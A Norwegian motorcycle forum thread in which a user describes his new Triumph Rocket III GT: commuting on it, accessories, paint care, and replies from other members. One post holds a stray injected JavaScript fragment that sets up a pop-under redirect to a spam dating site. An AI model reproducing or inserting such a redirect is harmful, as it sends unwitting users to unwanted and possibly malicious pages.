Bjerknez' | Snart sommerferie! :)

Din egen Forum-blogg! Om MC-livet ditt og annet du vil dele med andre.
Svar
Brukeravatar
Bjerknez
Innlegg: 23356
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Bjerknez - Triumph Rocket III GT

Legg inn av Bjerknez »

dypen skrev: 07 mar 2022, 19:55 Tøff sykkel med vanvittig motor :)

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Oj, den hadde jeg ikks sett før :)

Helt enig med han i det han skriver i videoen. Jeg hører bakhjulet glipper mer enn en gang når han drar på i videoen :)

Brukeravatar
Domino
Innlegg: 1102
Registrert: 06 jul 2020, 23:03
Motorsykkelen din: 2011 Triumph Tiger 800
Sted: Troms

Re: Bjerknez - Triumph Rocket III GT

Legg inn av Domino »

Gratulerer med et beist av en sykkel. Mer enn 4x sylindervolumet på min lille... Hvor ligger rødstreken på denne?

BjørnSover
Innlegg: 402
Registrert: 01 des 2020, 21:34
Motorsykkelen din: BMW R1200GSA 2018
Sted: Stavanger

Re: Bjerknez - Triumph Rocket III GT

Legg inn av BjørnSover »

Bjerknez skrev: 07 mar 2022, 10:06 Hehe, sant nok. :lol

Alltid morsomt når folk spør meg "hvor stor er den'a? 1200 eller?"

Da er det enda morsommere og svare "Kjører ikke moped. Det er en 2.5 liter" :lol :lol
Er ikke dette det nærmeste en kommer moped - trenger ikke gire.

Bjerkenez - er det du som har parkert scooteren utenfor vinduet?

Brukeravatar
Bjerknez
Innlegg: 23356
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Bjerknez - Triumph Rocket III GT

Legg inn av Bjerknez »

Domino skrev: 07 mar 2022, 21:38 Gratulerer med et beist av en sykkel. Mer enn 4x sylindervolumet på min lille... Hvor ligger rødstreken på denne?
Har aldri dratt den så langt, men jeg ser at rev limiter slår inn på 7.000rpm. Men jeg er ikke sikker. Finner ikke så voldsomt mye informasjon om det egentlig. :redface

Brukeravatar
Bjerknez
Innlegg: 23356
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Bjerknez - Triumph Rocket III GT

Legg inn av Bjerknez »

BjørnSover skrev: 07 mar 2022, 21:47
Bjerknez skrev: 07 mar 2022, 10:06 Hehe, sant nok. :lol

Alltid morsomt når folk spør meg "hvor stor er den'a? 1200 eller?"

Da er det enda morsommere og svare "Kjører ikke moped. Det er en 2.5 liter" :lol :lol
Er ikke dette det nærmeste en kommer moped - trenger ikke gire.

Bjerkenez - er det du som har parkert scooteren utenfor vinduet?
Du har trolig rett BjørnSover. Begynner å angre på kjøpet nå. Sender en mail til Graarud og sier jeg vil benytte meg av angreretten da jeg kjenner en som sier at denne egentlig er en moped og at jeg føler meg lurt :lol

Brukeravatar
Bjerknez
Innlegg: 23356
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Bjerknez - Triumph Rocket III GT

Legg inn av Bjerknez »

En ny duggfrisk tur på jobb med Rocket'en i dag. Tredje dagen på rad med LITT "spennende" føre enkelte steder. Synes dte er greit å starte sesongen med en litt bratt lærekurve for å komme litt inn i det igjen. har jo hatt en ganske lang MC tørke :)

I "Rain mode" og litt høyere gir er den trygg på usikkert underlag og den går som en lastebil. Den "romler" av gårde på innfartsåra i 60ish km/t. I dag var det en skoleelev som kjørte forbi meg på en 125cc "racersykkel" på innfartsåren i langt høyere hastighet og med et turtall som skjærte i ørene mine.

Han tenkte nok sitt om min sedate kjørestil, men man skal kanskje være glad for at han ikke viste hva jeg tenkte i motsatt fall. Jeg følte vertfall ikke for å bevise noe overfor fyren. Lenger borte stoppet han på Jet for å fylle drivstoff og jeg tankte at jeg kanskje skulle fyllt opp tanken selv, så jeg slapp dette midt i ettermiddagstrafikken etter jobb, så jeg svingte inn på samme stasjon.

Det viste seg at dette var en ganske kjepphøy og en alt for selvsikker fyr i mine øyne hvor han plutselig mens vi fylte tanken begynte å prate om at han hadde klart 0-100 på rundt 5 sekunder med sykkelen sin og at han skulle trimme den for å klare bedre tider etc.

Er det ikke like greit og vente til du er gammel nok til å kjøre en A2 eller tung sykkel da sa jeg, så slipper du å pådra deg bøter og indragelse av førerkort og det som værre er i ung alder?

Han var ikke så bekymret over det og i følge han selv så hadde han kjørt fra politiet mer enn en gang...........

Jeg tenkte at her var det ikke mye fornuft og hente, så det ble egentlig slutten på den samtalen. Jeg satt meg på sykkelen og lot han få kjøre først siden vi skulle samme vei. Han kom nok sikkert uansett til å blåse forbi meg med rødglødende stempler allikevel.

Det finnes mange oppegående unge mennesker og jeg kjenner flere, men dette her var et av unntakene. I ettertid ble jeg veldig usikker på om han faktisk eide sykkelen han kjørte eller om han hadde lappen i det hele tatt. Det at han hadde kjørt fra politiet flere ganger vet jeg ikke helt om jeg tror så mye på, men det spiller egentlig heller ingen trille for min del.

Man opplever noe nytt hver dag :)

Brukeravatar
Bjerknez
Innlegg: 23356
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Bjerknez - Triumph Rocket III GT

Legg inn av Bjerknez »

I dagfikk jeg Triumph tankvesken levert av Graarud, samt to tank pads som forøvrig så utrolig solide og tykke ut! Disse skal jeg sette på en dag det blir litt varmere.

Jeg er nok en av de få som synes en sykkel på en måte ser mer "maskulin" ut med tankveske, ved siden av at en tankveske slik jeg ser det er veldig nyttig hvis man skal ha mes seg småting.

Slik ble den vertfall seende ut med den orginale Triumph tankvesken beregnet for Rocket 3 GT.
6928A212-8228-4CB7-B421-15579547A3BD.jpeg
9D1AE549-8B19-45A5-9D59-303DB3EDA7B5.jpeg
4DCA1908-DE0D-4926-85D5-F6B34A7D0038.jpeg
83CBD49E-F481-4727-AFB2-A360196453C2.jpeg
Så et bilde av tank padsa:
31CCE0BD-48EE-414B-939A-60B3C8B7E89B.jpeg
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.

Brukeravatar
Bjerknez
Innlegg: 23356
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Bjerknez - Triumph Rocket III GT

Legg inn av Bjerknez »

Nå mangler jeg bare de orginale sideveskene som er på vei og disse skal monteres av Graarud motor. Disse er ganske geniale synes jeg og kan enkelt hukes av/på. Da mangler jeg bare en tail bag som kan ligge på tvers over salen bak, så skulle jeg nok ha lagringsplassen i orden :)

Brukeravatar
pingvin
Innlegg: 1654
Registrert: 20 okt 2013, 19:25
Motorsykkelen din: Triumph Scrambler 1200 XE

Re: Bjerknez - Triumph Rocket III GT

Legg inn av pingvin »

Grattis, denne får du mye moro med, synes Triumph har lykkes veldig bra med designet, litt mindre jålete enn Ducati Diavel og kulere enn amerikanske alternativer :thumleft Og fått veldig bra omtale i tester lest, hadde jeg hatt masse cash liggende ikke visste hva skulle bruke til, kunne det fort blitt Rocket i tillegg til Scrambleren.
2019 Triumph Scrambler 1200
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days

Online
Brukeravatar
AJ
Administrator
Innlegg: 38175
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: Bjerknez - Triumph Rocket III GT

Legg inn av AJ »

Bjerknez skrev: 08 mar 2022, 17:50 I dagfikk jeg Triumph tankvesken levert av Graarud,
Fin tankveske som også ser ut til å romme en del.
Utvidbar?

Og hvordan er den festet på tanken? Ikke med tankring, ser det ut som.
Mangnetfeste?
I så fall er det kanskje lurt å legge noe i mellom festepunkgter og tanken for å minske risken for riper.
Riper på blank sort lakk dynes veldig godt...

Men dette er nok ting du allerede har tenkt på og tatt de nødvendige grepene for å unngå.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
Bjerknez
Innlegg: 23356
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Bjerknez - Triumph Rocket III GT

Legg inn av Bjerknez »

pingvin skrev: 08 mar 2022, 18:15 Grattis, denne får du mye moro med, synes Triumph har lykkes veldig bra med designet, litt mindre jålete enn Ducati Diavel og kulere enn amerikanske alternativer :thumleft Og fått veldig bra omtale i tester lest, hadde jeg hatt masse cash liggende ikke visste hva skulle bruke til, kunne det fort blitt Rocket i tillegg til Scrambleren.
Takk for det pingvin. :)

Jeg har egentlig alltid vert svak når det gjelder Rocket. Men det har på en måte vært en sykkel som jeg regnet med å kjøpe "en vakker dag" og ikke for å "redde" MC interessen. Men jeg kjøpte en demosykkel som ikke har hatt noen eiere og den var kun gått 1200km. Når jeg kjøpte den. 5 års garanti i følge Graarud Motor og jeg fikk med første service og full veskeløsning inkludert sidevesker til en verdi av 16.000 kroner på kjøpet. Ferdig montert. Det vil si at verditapet i forhold til hva jeg ga for den nok er tatt for lenge siden.

Det er en av grunnene til at jeg lot drømmen gå i oppfyllelse litt tidligere enn anntatt. Samt det faktum at den sykkelen jeg egentlig bestillte ikke kunne leveres tidsnok til sommerferien så klart.

Men nå er jeg jo utrolig glad for at jeg gjorde som jeg gjorde. For en sinnsyk kjøremaskin.

Diavel ser ut som en plastleke i forhold synes jeg. Utseendemessig er Rocket helt konge i mine øyne. Passe klassisk, men også veldig moderne. Vinn vinn :)
Sist redigert av Bjerknez den 08 mar 2022, 18:28, redigert 1 gang totalt.

Brukeravatar
Bjerknez
Innlegg: 23356
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Bjerknez - Triumph Rocket III GT

Legg inn av Bjerknez »

AJ skrev: 08 mar 2022, 18:21
Bjerknez skrev: 08 mar 2022, 17:50 I dagfikk jeg Triumph tankvesken levert av Graarud,
Fin tankveske som også ser ut til å romme en del.
Utvidbar?

Og hvordan er den festet på tanken? Ikke med tankring, ser det ut som.
Mangnetfeste?
I så fall er det kanskje lurt å legge noe i mellom festepunkgter og tanken for å minske risken for riper.
Riper på blank sort lakk dynes veldig godt...

Men dette er nok ting du allerede har tenkt på og tatt de nødvendige grepene for å unngå.
Ja, det er magnetfeste. Poleringsbiten kan jeg, så en littt grundig polering en gang i året gjør nok susen. :thumleft Riper blir det okke som, mgnetfeste eller ikke. :)

Så langt kan det virke som om lakken er ganske hard. Ingen riper enda vertfall. Skikkelig myk lakk ser man ripene på med en gang.

Brukeravatar
pingvin
Innlegg: 1654
Registrert: 20 okt 2013, 19:25
Motorsykkelen din: Triumph Scrambler 1200 XE

Re: Bjerknez - Triumph Rocket III GT

Legg inn av pingvin »

Bjerknez skrev: 08 mar 2022, 18:22Passe klassisk, men også veldig moderne. Vinn vinn :)
Nettopp :thumleft Nesten alltid kjøpt lav km sykler, typisk 5.000km, max 10.000km. Sparer mye ifht nypris, slipper utgift til førstegangsservice og slipper innkjøring.
2019 Triumph Scrambler 1200
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days

Brukeravatar
Bjerknez
Innlegg: 23356
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Bjerknez - Triumph Rocket III GT

Legg inn av Bjerknez »

pingvin skrev: 08 mar 2022, 18:34
Bjerknez skrev: 08 mar 2022, 18:22Passe klassisk, men også veldig moderne. Vinn vinn :)
Nettopp :thumleft Nesten alltid kjøpt lav km sykler, typisk 5.000km, max 10.000km. Sparer mye ifht nypris, slipper utgift til førstegangsservice og slipper innkjøring.
Dessuten lever jeg i den tro at en større motor som ikke blir tynet i tide og utide holder litt lenger. Har ikke noe grunnlag for å mene det, men en 2.5 liter med 165HK'er og 220 NM vil neppe pådra seg noe lyskestrekk vil jeg tro.

Men jeg kan ta feil. :redface

Brukeravatar
Bjerknez
Innlegg: 23356
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Bjerknez - Triumph Rocket III GT

Legg inn av Bjerknez »

Da har jeg bestillt meg S100 fargefornyer og CG SpeedWipe, så etter noen dager med kjøring til jobb med nysykkelen, så blir det en liten vask av den til helgen. Jeg skal også fjerne noen klistremerker som Triumph har satt på rundt om på sykkelen.

Jeg må også kjøpe meg en liten poleringsmaskin, da jeg solgte den jeg hadde i fjor sommer. (dumme meg).

jeg har aldri hatt noe i mot kjedesmøring (sa brura), men nå slipper jeg jo vertfall den biten. For å være ærlig var jeg også litt skeptisk til hvor nyttig det var med all den kjedesmøringen/vasken også, men det er jo en annen sak...

Men, jeg trenger noen gode "lift stands" til sykkelen. Forran og bak. Hva er det som passer til denne? Slik at jeg kan løfte opp bakhjulet for å snurre det rundt etc. Det samme med framdekket...

Svar